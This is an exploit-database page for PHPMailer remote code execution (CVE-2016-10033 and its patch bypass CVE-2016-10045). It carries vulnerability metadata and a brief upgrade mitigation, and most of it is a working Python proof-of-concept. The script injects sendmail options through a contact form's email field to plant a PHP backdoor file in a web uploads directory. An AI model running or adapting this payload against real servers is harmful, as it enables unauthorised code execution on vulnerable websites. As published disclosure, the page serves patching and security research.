header-logo
Suggest Exploit
vendor:
PHPMailer
by:
Dawid Golunski
9,8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: PHPMailer
Affected Version From: PHPMailer < 5.2.18
Affected Version To: PHPMailer < 5.2.20
Patch Exists: YES
Related CWE: CVE-2016-10033, CVE-2016-10045
CPE: a:phpmailer:phpmailer
Metasploit: https://www.rapid7.com/db/vulnerabilities/moodle-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/moodle-cve-2016-10045/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2016

PHPMailer RCE PoC Exploits

PHPMailer < 5.2.18 and PHPMailer < 5.2.20 are vulnerable to Remote Code Execution. The exploit was discovered and coded by Dawid Golunski. The exploit is based on the bypass of the first patch for CVE-2016-10033.

Mitigation:

Upgrade to the latest version of PHPMailer.
Source

Exploit-DB raw data:

#!/usr/bin/python

intro = """
PHPMailer RCE PoC Exploits

PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)

Discovered and Coded by:

 Dawid Golunski
 @dawid_golunski
 https://legalhackers.com

"""
usage = """
Usage:

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html

PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Disclaimer:
For testing purposes only. Do no harm.

"""

import time
import urllib
import urllib2
import socket
import sys

RW_DIR = "/var/www/html/uploads"

url = 'http://VictimWebServer/contact_form.php' # Set destination URL here

# Choose/uncomment one of the payloads:

# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php  some"@email.com' % RW_DIR

# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php  some\"@email.com" % RW_DIR

######################################

# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"

post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}

# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()

Navigation

Suggest Exploit

Services By CQR